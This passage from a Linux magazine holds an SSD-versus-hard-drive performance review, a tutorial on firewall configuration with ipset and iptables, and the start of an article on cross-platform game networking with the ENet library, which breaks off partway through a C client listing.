Three years ago, I first reviewed an SSD (solid-state drive) under Linux (www.linuxjournal.com/article/10094). At the time, I had an ultra-portable laptop with a 4200rpm hard drive that really bogged down the performance on what was otherwise a pretty snappy little machine. Although there definitely were SSD reviews around, I didn't notice many comprehensive reviews for Linux. Instead of focusing strictly on benchmarks, I decided to focus more on real-world tests. In the end, I saw dramatic increases in speed for the SSD compared to my 4200rpm drive.

That may have been true back then, but what about today? For example, one thing that always bothered me about my first comparison was the fact that at the time, I had only a 4200rpm 1.8" drive available to me, and I was limited by my ATA/66 bus speed. My new laptop, a Lenovo ThinkPad X200s, came with a 7200rpm 2.5" SATA drive, and ever since I got the laptop, I've been curious to repeat my experiment with modern equipment. How would a modern SSD hold up to a modern 7200rpm SATA drive in real-world Linux use? Recently, Intel was kind enough to provide me with a review unit of its new 320 SSD line, a follow-up to the X25 SSD line, so I decided to repeat my experiments.

My Testing Methodology

As in the previous review, I focus mostly on real-world performance tests, but I still throw in some raw benchmark numbers for those of you in the crowd who are curious. Where it made sense, I ran multiple tests to confirm I got consistent results, and here, I report the best performance for each drive. Also, when I was concerned about file-caching skewing results, I booted the machine from scratch before a test. The 7200rpm drive is a 160GB Fujitsu MHZ2160B, and after its tests, I transferred an identical filesystem to the 160GB Intel 320 SSD.


Editor's Note: All SSDs Are Not Created Equal (see the video at http://www.linuxjournal.com/video-ssd-editor-note)

Test 1: GRUB to Log In

I'll be honest, I actually don't boot my laptop all that much. My battery life is good enough that I usually just close the laptop lid when I'm not using it; it suspends to RAM, and I resume my session later. That said, distributions, such as Ubuntu, have focused on boot times in the past couple releases, and my 7200rpm drive seemed to boot Ubuntu 10.04 pretty fast, so I was curious whether I even would see an improvement with the SSD. I used a stopwatch to measure the time between pressing Enter at the GRUB prompt to when I saw the login screen. The boot process is both processor- and disk-intensive, and although the 7200rpm was fast, it turns out there still was room for improvement:

■ 7200rpm: 27 seconds
■ SSD: 16 seconds


Test 2: Log In to Desktop

The next logical test was to time how long it takes from the login screen until reaching a full, functioning desktop. In my case, that meant I started the stopwatch after I typed my password and pressed Enter, and I stopped the stopwatch once my desktop loaded and my terminals and Firefox appeared on the screen. In this case, the SSD really stood out by loading my desktop in less than half the time:

■ 7200rpm: 22 seconds
■ SSD: 9 seconds

Test 3: hdparm

For the next test, I ran hdparm with its traditional -Tt benchmarking options on both drives. Although not as full-featured as Bonnie++, the fact that hdparm outputs only a few metrics definitely makes it easier to do a comparison:

7200rpm:

$ sudo hdparm -Tt /dev/sda6

/dev/sda6:
 Timing cached reads:   6748 MB in 1.99 seconds = 3383.99 MB/sec
 Timing buffered disk reads: 220 MB in 3.01 seconds = 73.08 MB/sec

SSD:

$ sudo hdparm -Tt /dev/sda6

/dev/sda6:
 Timing cached reads:   7168 MB in 1.99 seconds = 3595.46 MB/sec
 Timing buffered disk reads: 500 MB in 3.00 seconds = 166.48 MB/sec

As you can see in these results, the SSD was a bit faster with cached reads but not by as much of a margin as in the past tests. That said, the buffered disk reads, again, were about twice as fast. This far along in the tests, I started to notice a pattern: the SSD seems to be about two times as fast as my 7200rpm drive for most of the tests. The real question for me was whether it would maintain that kind of performance through the rest of the tests.

Test 4: Bonnie++

Although hdparm can be useful for getting basic hard drive performance metrics, when you want detailed information and a larger range of tests, Bonnie++ is the program to use. The downside, of course, is that you get a huge amount of benchmark data to wade through. I won't go through metric by metric. Instead, I show the output from the commands but talk about only a few highlights:

7200rpm (output modified to fit):

------Sequential Output------ --Sequential Input- --Random-
-Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
  186  99 71090  17 33138  19  1251  97 83941  17 175.2   4
Latency    49232us    1079ms     759ms   54918us     188ms     294ms

------Sequential Create------ --------Random Create--------
-Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
 /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
  258   2 +++++ +++   369   3   345   3 +++++ +++   323   3
Latency      314ms     633us     150ms     151ms     486us     398ms


SSD (output modified to fit):

------Sequential Output------ --Sequential Input- --Random-
-Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
  187  99 164010 40 85149  32  1325  99 297390 60  4636 124
Latency    52047us     423ms     336ms   21716us   12432us    9048us

------Sequential Create------ --------Random Create--------
-Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--
 /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP  /sec %CP
 9079  56 +++++ +++ 10451  63  8292  60 +++++ +++  7043  61
Latency     5177us     283us    5218us   10723us     30us   16179us

Okay, that is a lot of data to go through, so let's just pick out a few metrics to highlight. What I found interesting was that except for the tests where the CPU was a limiting factor (like Per-Character tests), the SSD seemed to have dramatically better performance than the 7200rpm drive. The SSD is around twice as fast as the 7200rpm drive in Sequential Output Block and Rewrite tests (71,090 K/sec vs. 164,010 K/sec and 33,138 K/sec vs. 85,149 K/sec, respectively). Switching to reads and random seeks though, there's a much wider gap, such as in the Block test (83,941 K/sec vs.
297,390 K/sec), and the random seeks (a known strength for SSDs) are almost no


comparison with 175.2 seeks per second compared to 4,636.

All of that said, it's with the file creation tests that the SSD performance really shines. In sequential file creation, where the 7200rpm drive can create and delete 248 and 369 files per second, respectively, the SSD goes through 9,079 and 10,451 files per second. The same goes for random file creation with the 7200rpm's create and delete scores of 345 and 323 files per second compared to the SSD's 8,292 and 7,043 files per second. This is really one good reason why I have included so many real-world tests in this review. After all, you can look at some of these numbers and conclude that if you got the SSD, your system may be 20 times faster, yet it's how these numbers apply in real applications that ultimately matters.

Test 5: VirtualBox Torture Test

The next test I decided to perform was one that I felt might highlight some of the performance advantages of the SSD: virtualization. These days, it's more and more reasonable to use an ordinary laptop as a platform to run multiple virtual machines, and although I knew that having multiple VMs on at the same time had the tendency to slow down my system greatly, I wondered whether the SSD might show an improvement. To try to quantify this, I invented the following test. I set up two identical VirtualBox VMs pointed at the same Ubuntu Server .iso file. Both systems were given their own dynamically allocated virtual hard drive. Then, I booted the VMs, and at the boot screen, I pointed them to a kickstart file I created to automate the Ubuntu Server installation process. I started the stopwatch the moment I pressed Enter on one of the VMs, then quickly started the second at the same time. I didn't stop the stopwatch until the last system rebooted and showed my login screen. What I figured was that having both VMs read from the same .iso file and write to separate virtual disks on the same physical hard drive would be a good torture test for the drive.
To avoid any issues with file caches, when it came to the SSD, I created all new VMs with new disks. Here are the results:

■ 7200rpm: 11 minutes, 7 seconds
■ SSD: 10 minutes, 32 seconds

I admit these results really surprised me. I was expecting a much more dramatic difference, but it turned out that although the test really sounded like one that would work out the hard drives, in both cases, it was my dual-core CPU that got the workout. It goes to show that disk I/O isn't always the bottleneck, and sometimes a faster drive doesn't make everything faster.

Test 6: Filesystem Traversal

For the final test, I wanted to compare how fast both drives allowed me to traverse the filesystem. In my February 2008 column (www.linuxjournal.com/article/9944), I talked about how to clean up space on your


hard drive using the "duck command" or:

$ cd /
$ du -ck | sort -n

This command traverses the entire filesystem and calculates how much space is being taken up by the files in each directory recursively. When it's done, it creates a tally that shows you not only which overall directories take up the most space, but also which directories within them are the real culprits. Because I realized that the sort command wouldn't help me test the disks at all, I skipped it and just timed how long it took to run du -ck


starting from /:

7200rpm:

real 5m25.551s
user 0m2.700s
sys 0m18.589s

SSD:

real 0m41.663s
user 0m2.040s
sys 0m13.453s

This result also really surprised me. Based on some of my other tests, I thought the SSD would be faster, but only by around a factor of two. I definitely didn't expect the SSD to complete the test in an eighth of the time. I think part of this must have to do with the dramatically better random seek performance.

Conclusion

When it comes to SSDs, most people these days realize that this performance does come at a price. The question is, is it worth it? Honestly, that's a difficult question to answer. After all, in a good deal of my tests, I did see two times or better performance out of the SSD, and in some cases, dramatically better performance. I also must admit that I saw other more subtle improvements. For example, when my network backup job ran on my 7200rpm drive, I definitely would notice as my system slowed to a crawl. In fact, sometimes I'd even kill the rsync and run the backup later, because I could barely browse the Web. On the SSD, I didn't even notice when the backup ran. When it comes to performance, by the way, I should note that right now, not only does the Intel 320 series of drives have a wide range of prices depending on what size drive you get, but also, according to Intel's product page, the lower-capacity drives actually tout reduced speeds.

This particular 160GB drive currently retails for around $300 on-line. Although it's true that's a lot of money for 160GB of storage, honestly, I tend to store bulk files on a file server at home. Back when 32GB SSDs were the affordable norm, you had to make some storage sacrifices for speed, but at this point, I am comfortable with the 160GB drive my laptop came with. It really does just come down to price.
You will have to make your own judgment based on the price versus the performance; however, an important factor for me that makes me lean toward the SSD is how much extra life it gives to my current laptop. The processor and RAM in this laptop are more than adequate for my daily needs, and really any performance issues I've ever had with the machine could be traced back to the storage. I expect with the increased performance of an SSD, I could get another few years out of a laptop I already have had for quite some time—a laptop that would cost much more than the price of an SSD to replace.■

Kyle Rankin is a Sr. Systems Administrator in the San Francisco Bay Area and the author of a number of books, including The Official Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks. He is currently the president of the North Bay Linux Users' Group.




ADVANCED FIREWALL CONFIGURATIONS with ipset

With significant performance gains and powerful extra features—like the ability to apply single firewall rules to entire groups of hosts and networks at once—ipset may be iptables' perfect match.

HENRY VAN STYN

iptables is the user-space tool for configuring firewall rules in the Linux kernel. It is actually a part of the larger netfilter framework. Perhaps because iptables is the most visible part of the netfilter framework, the framework is commonly referred to collectively as iptables. iptables has been the Linux firewall solution since the 2.4 kernel.

ipset is an extension to iptables that allows you to create firewall rules that match entire "sets" of addresses at once. Unlike normal iptables chains, which are stored and traversed linearly, IP sets are stored in indexed data structures, making lookups very efficient, even when dealing with large sets.

Besides the obvious situations where you might imagine this would be useful, such as blocking long lists of "bad" hosts without worry of killing system resources or causing network congestion, IP sets also open up new ways of approaching certain


aspects of firewall design and simplify many configuration scenarios.

In this article, after quickly discussing ipset's installation requirements, I spend a bit of time on iptables' core fundamentals and concepts. Then, I cover ipset usage and syntax and show how it integrates with iptables to accomplish various configurations. Finally, I provide some detailed and fairly advanced real-world examples of how ipsets can be used to solve all sorts of problems.

Because ipset is just an extension to iptables, this article is as much about iptables as it is about ipset, although the focus is those features relevant to understanding and using ipset.

Getting ipset

ipset is a simple package option in many distributions, and since plenty of other installation resources are available, I don't spend a whole lot of time on that here. The important thing to understand is that, like iptables, ipset consists of both a user-space tool and a kernel module, so you need both for it to work properly. You also need an "ipset-aware" iptables binary to be able to add rules that match against sets.

Start by simply doing a search for "ipset" in your distribution's package management tool. There is a good chance you'll be able to find an easy procedure to install ipset in a turnkey way. In Ubuntu (and probably Debian), install the ipset and xtables-addons-source packages. Then, run module-assistant auto-install xtables-addons, and ipset is ready to go in less than 30 seconds.

Figure 1. iptables Built-in Chains Traversal Order

If your distro doesn't have built-in support, follow the manual installation procedure listed on the ipset home page (see Resources) to build from source and patch your kernel and iptables.

The versions used in this article are ipset v4.3 and iptables v1.4.9.

iptables Overview

In a nutshell, an iptables firewall configuration consists of a set of built-in "chains" (grouped into four "tables") that each comprise a list of "rules".
For every packet, and at each stage of processing, the kernel consults the appropriate chain to determine the fate of the packet. Chains are consulted in order, based on the "direction" of the packet (remote-to-local, remote-to-remote or local-to-remote) and its current "stage" of processing (before or after "routing"). See Figure 1.

When consulting a chain, the packet is compared to each and every one of the


chain's rules, in order, until it matches a rule. Once the first match is found, the action specified in the rule's target is taken. If the end of the chain is reached without finding a match, the action of the chain's default target, or policy, is taken.

A chain is nothing more than an ordered list of rules, and a rule is nothing more than a match/target combination. A simple example of a match is "TCP destination port 80". A simple example of a target is "accept the packet". Targets also can redirect to other user-defined chains, which provide a mechanism for the grouping and subdividing of rules, and cascading through multiple matches and chains to arrive finally at an action to be taken on the packet.

Figure 2. Anatomy of an iptables Command

Every iptables command for defining rules, from the very short to the very long, is composed of three basic parts that specify the table/chain (and order), the match and the target (Figure 2).

To configure all these options and create a complete firewall configuration, you run a series of iptables commands in a specific order.

iptables is incredibly powerful and extensible. Besides its many built-in features, iptables also provides an API for custom "match extensions" (modules for classifying packets) and "target extensions" (modules for what actions to take when packets match).

Enter ipset

ipset is a "match extension" for iptables. To use it, you create and populate uniquely named "sets" using the ipset command-line tool, and then separately reference those sets in the match specification of one or more iptables rules.

A set is simply a list of addresses stored efficiently for fast lookup.

Take the following normal iptables commands that would block inbound traffic from 1.1.1.1 and 2.2.2.2:

iptables -A INPUT -s 1.1.1.1 -j DROP
iptables -A INPUT -s 2.2.2.2 -j DROP

The match specification syntax -s 1.1.1.1 above means "match packets whose source address is 1.1.1.1".
To block both 1.1.1.1 and 2.2.2.2, two separate iptables rules with two separate match specifications (one for 1.1.1.1 and one for 2.2.2.2) are defined above.

Alternatively, the following ipset/iptables commands achieve the same result:

ipset -N myset iphash
ipset -A myset 1.1.1.1


ipset -A myset 2.2.2.2
iptables -A INPUT -m set --set myset src -j DROP

The ipset commands above create a new set (myset of type iphash) with two addresses (1.1.1.1 and 2.2.2.2).

The iptables command then references the set with the match specification -m set --set myset src, which means "match packets whose source header matches (that is, is contained within) the set named myset". The flag src means match on "source". The flag dst would match on "destination", and the flag src,dst would match on both source and destination.

In the second version above, only one iptables command is required, regardless of how many additional IP addresses are contained within the set. Although this example uses only two addresses, you could just as easily define 1,000 addresses, and the ipset-based config still would require only a single iptables rule, while the previous approach, without the benefit of ipset, would require 1,000 iptables rules.

Set Types

Each set is of a specific type, which defines what kind of values can be stored in it (IP addresses, networks, ports and so on) as well as how packets are matched (that is, what part of the packet should be checked and how it's compared to the set). Besides the most common set types, which check the IP address, additional set types are available that check the port, the IP address and port together, MAC address and IP address together and so on.

Each set type has its own rules for the type, range and distribution of values it can contain. Different set types also use different types of indexes and are optimized for different scenarios. The best/most efficient set type depends on the situation.

The most flexible set types are iphash, which stores lists of arbitrary IP addresses, and nethash, which stores lists of arbitrary networks (IP/mask) of varied sizes.
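As a quick sketch of those two set types side by side, the following firewall configuration fragment (the set names and addresses are made up for illustration; the commands need root and the ipset kernel modules loaded) blocks a handful of individual hosts plus whole networks of varied sizes with just two iptables rules:

```shell
# individual problem hosts go in an iphash set
ipset -N bad_hosts iphash
ipset -A bad_hosts 1.1.1.1
ipset -A bad_hosts 5.5.5.5

# whole problem networks, with different mask lengths, go in a nethash set
ipset -N bad_nets nethash
ipset -A bad_nets 10.99.0.0/16
ipset -A bad_nets 192.0.2.0/24

# one rule per set drops traffic from all of them
iptables -A INPUT -m set --set bad_hosts src -j DROP
iptables -A INPUT -m set --set bad_nets src -j DROP
```

Growing either list later is just another ipset -A command; the two iptables rules never change.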
Refer to the ipset man page for a listing and description of all the set types (there are 11 in total at the time of this writing).

The special set type setlist also is available, which allows grouping several sets together into one. This is required if you want to have a single set that contains both single IP addresses and networks, for example.

Advantages of ipset

Besides the performance gains, ipset also allows for more straightforward configurations in many scenarios.

If you want to define a firewall condition that would match everything but packets from 1.1.1.1 or 2.2.2.2 and continue processing in mychain, notice that the following does not work:

iptables -A INPUT -s ! 1.1.1.1 -g mychain
iptables -A INPUT -s ! 2.2.2.2 -g mychain

If a packet came in from 1.1.1.1, it would not match the first rule (because the source address is 1.1.1.1), but it would match the second rule (because the source


address is not 2.2.2.2). If a packet came in from 2.2.2.2, it would match the first rule (because the source address is not 1.1.1.1). The rules cancel each other out—all packets will match, including 1.1.1.1 and 2.2.2.2.

Although there are other ways to construct the rules properly and achieve the desired result without ipset, none are as intuitive or straightforward:

ipset -N myset iphash
ipset -A myset 1.1.1.1
ipset -A myset 2.2.2.2
iptables -A INPUT -m set ! --set myset src -g mychain

In the above, if a packet came in from 1.1.1.1, it would not match the rule (because the source address 1.1.1.1 does match the set myset). If a packet came in from 2.2.2.2, it would not match the rule (because the source address 2.2.2.2 does match the set myset).

Although this is a simplistic example, it illustrates the fundamental benefit associated with fitting a complete condition in a single rule. In many ways, separate iptables rules are autonomous from each other, and it's not always straightforward, intuitive or optimal to get separate rules to coalesce into a single logical condition, especially when it involves mixing normal and inverted tests. ipset just makes life easier in these situations.

Another benefit of ipset is that sets can be manipulated independently of active iptables rules. Adding/changing/removing entries is a trivial matter because the information is simple and order is irrelevant. Editing a flat list doesn't require a whole lot of thought. In iptables, on the other hand, besides the fact that each rule is a significantly more complex object, the order of rules is of fundamental importance, so in-place rule modifications are much heavier and potentially error-prone operations.

Excluding WAN, VPN and Other Routed Networks from the NAT—the Right Way

Outbound NAT (SNAT or IP masquerade) allows hosts within a private LAN to access the Internet.
An appropriate iptables NAT rule matches Internet-bound packets originating from the private LAN and replaces the source address with the address of the gateway itself (making the gateway appear to be the source host and hiding the private "real" hosts behind it).

NAT automatically tracks the active connections so it can forward return packets back to the correct internal host (by changing the destination from the address of the gateway back to the address of the original internal host).

Here is an example of a simple outbound NAT rule that does this, where 10.0.0.0/24 is the internal LAN:

iptables -t nat -A POSTROUTING \
    -s 10.0.0.0/24 -j MASQUERADE

This rule matches all packets coming from the internal LAN and masquerades them (that is, it applies "NAT" processing). This might be sufficient if the only route is to the Internet, where all through traffic is Internet traffic. If, however, there are routes


to other private networks, such as with VPN or physical WAN links, you probably don't want that traffic masqueraded.

One simple way (partially) to overcome this limitation is to base the NAT rule on physical interfaces instead of network numbers (this is one of the most popular NAT rules given in on-line examples and tutorials):

iptables -t nat -A POSTROUTING \
    -o eth0 -j MASQUERADE

This rule assumes that eth0 is the external interface and matches all packets that leave on it. Unlike the previous rule, packets bound for other networks that route out through different interfaces won't match this rule (like with OpenVPN links).

Although many network connections may route through separate interfaces, it is not safe to assume that all will. A good example is KAME-based IPsec VPN connections (such as Openswan) that don't use virtual interfaces like other user-space VPNs (such as OpenVPN).

Another situation where the above interface match technique wouldn't work is if the outward-facing ("external") interface is connected to an intermediate network with routes to other private networks in addition to a route to the Internet. It is entirely plausible for there to be routes to private networks that are several hops away and on the same path as the route to the Internet.

Designing firewall rules that rely on matching of physical interfaces can place artificial limits and dependencies on network topology, which makes a strong case for it to be avoided if it's not actually necessary.

As it turns out, this is another great application for ipset. Let's say that besides acting as the Internet gateway for the local private LAN (10.0.0.0/24), your box routes directly to four other private networks (10.30.30.0/24, 10.40.40.0/24, 192.168.4.0/23 and 172.22.0.0/22). Run the following commands:

ipset -N routed_nets nethash
ipset -A routed_nets 10.30.30.0/24
ipset -A routed_nets 10.40.40.0/24
ipset -A routed_nets 192.168.4.0/23
ipset -A routed_nets 172.22.0.0/22
iptables -t nat -A POSTROUTING \
    -s 10.0.0.0/24 \
    -m set ! \
    --set routed_nets dst \
    -j MASQUERADE

As you can see, ipset makes it easy to zero in on exactly what you want matched and what you don't. This rule would masquerade all traffic passing through the box from your internal LAN (10.0.0.0/24) except those packets bound for any of the networks in your routed_nets set, preserving normal direct IP routing to those networks. Because this configuration is based purely on network addresses, you don't have to worry about the types of connections in place (type of VPNs, number of hops and so on), nor do you have to worry about physical interfaces and topologies.

This is how it should be. Because this is a pure layer-3 (network-layer) implementation, the underlying classifications required to achieve it should be pure layer-3 as well.
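A further convenience of this arrangement is that the set can be maintained live, without ever touching the NAT rule again. A hypothetical maintenance session might look like the following configuration sketch (it assumes the routed_nets set from above, needs root and the ipset kernel modules, and the addresses are invented):

```shell
# a new VPN subnet comes on-line: extend the set, and the
# NAT exclusion picks it up immediately
ipset -A routed_nets 10.50.50.0/24

# test whether a particular destination would bypass the NAT
ipset -T routed_nets 10.30.30.5

# review the current members of the set
ipset -L routed_nets
```
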


Limiting Certain PCs to Have Access Only to Certain Public Hosts

Let's say the boss is concerned about certain employees playing on the Internet instead of working and asks you to limit their PCs' access to a specific set of sites they need to be able to get to for their work, but he doesn't want this to affect all PCs (such as his).

To limit three PCs (10.0.0.5, 10.0.0.6 and 10.0.0.7) to have outside access only to worksite1.com, worksite2.com and worksite3.com, run the following commands:

ipset -N limited_hosts iphash
ipset -A limited_hosts 10.0.0.5
ipset -A limited_hosts 10.0.0.6
ipset -A limited_hosts 10.0.0.7
ipset -N allowed_sites iphash
ipset -A allowed_sites worksite1.com
ipset -A allowed_sites worksite2.com
ipset -A allowed_sites worksite3.com
iptables -I FORWARD \
    -m set --set limited_hosts src \
    -m set ! --set allowed_sites dst \
    -j DROP

This example matches against two sets in a single rule. If the source matches limited_hosts and the destination does not match allowed_sites, the packet is dropped (because limited_hosts are allowed to communicate only with allowed_sites).

Note that because this rule is in the FORWARD chain, it won't affect communication to and from the firewall itself, nor will it affect internal traffic (because that traffic wouldn't even involve the firewall).

Blocking Access to Hosts for All but Certain PCs (Inverse Scenario)

Let's say the boss wants to block access to a set of sites across all hosts on the LAN except his PC and his assistant's PC.
For variety, in this example, let's match the boss and assistant PCs by MAC address instead of IP. Let's say the MACs are 11:11:11:11:11:11 and 22:22:22:22:22:22, and the sites to be blocked for everyone else are badsite1.com, badsite2.com and badsite3.com.

In lieu of using a second ipset to match the MACs, let's utilize multiple iptables commands with the MARK target to mark packets for processing in subsequent rules in the same chain:

ipset -N blocked_sites iphash
ipset -A blocked_sites badsite1.com
ipset -A blocked_sites badsite2.com
ipset -A blocked_sites badsite3.com
iptables -I FORWARD -m mark --mark 0x187 -j DROP
iptables -I FORWARD \
    -m mark --mark 0x187 \
    -m mac --mac-source 11:11:11:11:11:11 \
    -j MARK --set-mark 0x0
iptables -I FORWARD \
    -m mark --mark 0x187 \
    -m mac --mac-source 22:22:22:22:22:22 \
    -j MARK --set-mark 0x0
iptables -I FORWARD \
    -m set --set blocked_sites dst \
    -j MARK --set-mark 0x187

As you can see, because you're not using ipset to do all the matching work as in the previous example, the commands are quite a bit more involved and complex. Because there are


multiple iptables commands, it's necessary to recognize that their order is vitally important.

Notice that these rules are being added with the -I option (insert) instead of -A (append). When a rule is inserted, it is added to the top of the chain, pushing all the existing rules down. Because each of these rules is being inserted, the effective order is reversed, because as each rule is added, it is inserted above the previous one.

The last iptables command above actually becomes the first rule in the FORWARD chain. This rule matches all packets with a destination matching the blocked_sites ipset, and then marks those packets with 0x187 (an arbitrarily chosen hex number). The next two rules match only packets from the hosts to be excluded and that are already marked with 0x187. These two rules then set the marks on those packets to 0x0, which "clears" the 0x187 mark.

Finally, the last iptables rule (which is represented by the first iptables command above) drops all packets with the 0x187 mark. This should match all packets with destinations in the blocked_sites set except those packets coming from either of the excluded MACs, because the mark on those packets is cleared before the DROP rule is reached.

This is just one way to approach the problem. Other than using a second ipset, another way would be to utilize user-defined chains.

If you wanted to use a second ipset instead of the mark technique, you wouldn't be able to achieve the exact outcome as above, because ipset does not have a machash set type. There is a macipmap set type, however, but this requires matching on IP and MACs together, not on MAC alone as above.

Cautionary note: in most practical cases, this solution would not actually work for Web sites, because many of the hosts that might be candidates for the blocked_sites set (like Facebook, MySpace and so on) may have multiple IP addresses, and those IPs may change frequently.
A general limitation of iptables/ipset is that hostnames should be specified only if they resolve to a single IP. Also, hostname lookups happen only at the time the command is run, so if the IP address changes, the firewall rule will not be aware of the change and still will reference the old IP. For this reason, a better way to accomplish these types of Web access policies is with an HTTP proxy solution, such as Squid. That topic is obviously beyond the scope of this article.

Automatically Ban Hosts That Attempt to Access Invalid Services

ipset also provides a "target extension" to iptables that provides a mechanism for dynamically adding and removing set entries based on any iptables rule. Instead of having to add entries manually with the ipset command, you can have iptables add them for you on the fly.

For example, if a remote host tries to connect to port 25, but you aren't running an SMTP server, it probably is up to no good. To deny that host the opportunity to try anything else proactively, use the following rules:

ipset -N banned_hosts iphash
iptables -A INPUT \
    -p tcp --dport 25 \


    -j SET --add-set banned_hosts src
iptables -A INPUT \
    -m set --set banned_hosts src \
    -j DROP

If a packet arrives on port 25, say with source address 1.1.1.1, it instantly is added to banned_hosts, just as if this command were run:

ipset -A banned_hosts 1.1.1.1

All traffic from 1.1.1.1 is blocked from that moment forward because of the DROP rule.

Note that this also will ban hosts that try to run a port scan unless they somehow know to avoid port 25.

Clearing the Running Config

If you want to clear the ipset and iptables config (sets, rules, entries) and reset to a fresh open firewall state (useful at the top of a firewall script), run the following commands:

iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t filter -F
iptables -t raw -F
iptables -t nat -F
iptables -t mangle -F
ipset -F
ipset -X

Sets that are "in use", which means referenced by one or more iptables rules, cannot be destroyed (with ipset -X). So, in order to ensure a complete "reset" from any state, the iptables chains have to be flushed first (as illustrated above).

Conclusion

ipset adds many useful features and capabilities to the already very powerful netfilter/iptables suite. As described in this article, ipset not only provides new firewall configuration possibilities, but it also simplifies many setups that are difficult, awkward or less efficient to construct with iptables alone.

Any time you want to apply firewall rules to groups of hosts or addresses at once, you should be using ipset. As I showed in a few examples, you also can combine ipset with some of the more exotic iptables features, such as packet marking, to accomplish all sorts of designs and network policies.

The next time you're working on your firewall setup, consider adding ipset to the mix. I think you will be surprised at just how useful and flexible it can be.■

Henry Van Styn is the founder of IntelliTree Solutions, an IT consulting and software development firm located in Cincinnati, Ohio.
Henry has been developing software and solutions for more than ten years, ranging from sophisticated Web applications to low-level network and system utilities. He is the author of Strong Branch Linux, an in-house server distribution based on Gentoo. Henry can be contacted at www.intellitree.com.

Resources

Netfilter/iptables Project Home Page: www.netfilter.org

ipset Home Page: ipset.netfilter.org




CROSS-PLATFORM NETWORK PROGRAMMING MADE EASY.

Mike Diehl

Creating a multiplayer game can be a lot of fun, but navigating the complexities of IP network programming can be a headache. That's kind of a strange statement, but the two go hand in hand. You can't write a multiplayer game without some sort of network-based communications, and game-related network programming introduces difficulties not often found with simpler applications. For example, most game developers are concerned with bandwidth utilization and throttling. There's also player session management to contend with. Then, there's the problem of message fragmentation, acknowledgement and sequencing. Oh, and you'd really like to be able to make your game run on both Linux and Windows. That's a tall order for developers who probably are more concerned with writing their games than they are in becoming experts in cross-platform network programming. Fortunately,


the ENet library (enet.bespin.org) takes care of these details and presents developers with a simple, flexible and consistent API.

ENet's event-driven programming model makes client session management very simple. The library dispatches an event when a peer connects or disconnects, and when a message is received from a peer. The developer simply writes event handlers that take care of initializing and deallocating resources, and acting upon incoming messages. This means you don't have to worry about the complexities of forking, preforking, threading or nonblocking calls to connect() and accept() in order to handle multiple connections. With ENet, all you do is make periodic calls to its event dispatcher and handle the events as they come in.

ENet provides for both reliable and unreliable transmission. The networking industry really needs to find a better term than "unreliable", however. Unreliable means that a packet will be sent out, but the receiving end won't be expected to acknowledge receiving the packet. In a "reliable" protocol, every packet must be acknowledged upon receipt. If a peer sends out a packet and requests acknowledgement and doesn't receive it in a timely fashion, the packet will be resent automatically until it is acknowledged, or the peer is deemed to be unreachable. The nice thing about ENet is that the same API provides both reliable and unreliable semantics.

ENet also makes it easy to write real-time client-server applications by taking care of packet fragmentation and sequencing chores for you. Put simply, fragmentation and reassembly is done automatically and is transparent to the developer. Sequencing also is handled transparently and can be turned on and off at will. ENet's concept of a communications channel is related to sequencing. ENet buffers each channel separately and empties each buffer in numerical sequence. The end result is that you can transmit multiple data streams and that lower-numbered channels have higher priority.
For example, you could put all real-time game update packets into channel 1, while system status packets could be in a lower-priority channel.

For the sake of demonstration, I discuss both the client and server for a simple chat program. The code I'm using is based on a 3-D video game I'm writing in my limited free time. However, while stripping the code down to its basics, I left something out and couldn't get it to work. So, I posted a description of my problem and code snippets to the ENet e-mail list. Within an hour, I had a reply that showed me how to fix my problem. Thanks, Nuno.

In this example, a user starts the client and provides a user name as a command parameter. Once a client session has been created, the client is expected to tell the server the name of the user, as the very first message sent from the client. Then, anything the user types will be sent to the server. Any messages that come from the server will be displayed on the client's screen. Because all user input is taken in a blocking fashion, the user won't actually see any incoming messages until


FEATURE Network Programming with ENet

pressing the Enter key. This isn't ideal, but the point of the code is to demonstrate the ENet library, not nonblocking I/O on STDIN and the necessary cursor control. (In a real-world situation, your programs would be generating messages, such as player movement and projectile impact, in real time anyway.) If the user simply presses the Enter key, no message is sent to the server, but any queued-up messages will be displayed. If the user types the letter q and presses Enter, the client disconnects and terminates.

The server also is very simple. When a client connects, the server waits for the client to identify the user. Then, the server sends a broadcast message announcing the new user's connection. When a client disconnects, that fact also is broadcast to all connected users. When a client sends a message, that message is sent to every connected client, except the one who sent it. Like I said, it's a very simple chat system.

Let's look at some code. First, let's get a few #defines out of the way. Take a look at config.h shown in Listing 1. This is pretty straightforward, so let's look at the client code shown in Listing 2. Lines 1–17 are boilerplate. Note that on line 3, I include enet/enet.h and not simply enet.h. The ENet documentation indicates that enet.h

Listing 1. config.h

#define HOST "localhost"
#define PORT (7000)
#define BUFFERSIZE (1000)

Listing 2. Client Code

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 #include <enet/enet.h>
 4 #include "config.h"
 5 #include <string.h>
 6 char buffer[BUFFERSIZE];
 7 ENetHost *client;
 8 ENetAddress address;
 9 ENetEvent event;
10 ENetPeer *peer;
11 ENetPacket *packet;
12 int main(int argc, char ** argv) {
13   int connected=0;
14   if (argc != 2) {
15     printf("Usage: client username\n");
16     exit(1);
17   }
18   if (enet_initialize() != 0) {
19     printf("Could not initialize enet.\n");
20     return 0;
21   }
22   client = enet_host_create(NULL, 1, 2, 5760/8, 1440/8);
23   if (client == NULL) {
24     printf("Could not create client.\n");


25     return 0;
26   }
27   enet_address_set_host(&address, HOST);
28   address.port = PORT;
29   peer = enet_host_connect(client, &address, 2, 0);
30   if (peer == NULL) {
31     printf("Could not connect to server\n");
32     return 0;
33   }
34   if (enet_host_service(client, &event, 1000) > 0 &&
35       event.type == ENET_EVENT_TYPE_CONNECT) {
36     printf("Connection to %s succeeded.\n", HOST);
37     connected++;
38     strncpy(buffer, argv[1], BUFFERSIZE);
39     packet = enet_packet_create(buffer, strlen(buffer)+1, ENET_PACKET_FLAG_RELIABLE);
40     enet_peer_send(peer, 0, packet);
41   } else {
42     enet_peer_reset(peer);
43     printf("Could not connect to %s.\n", HOST);
44     return 0;
45   }
46   while (1) {
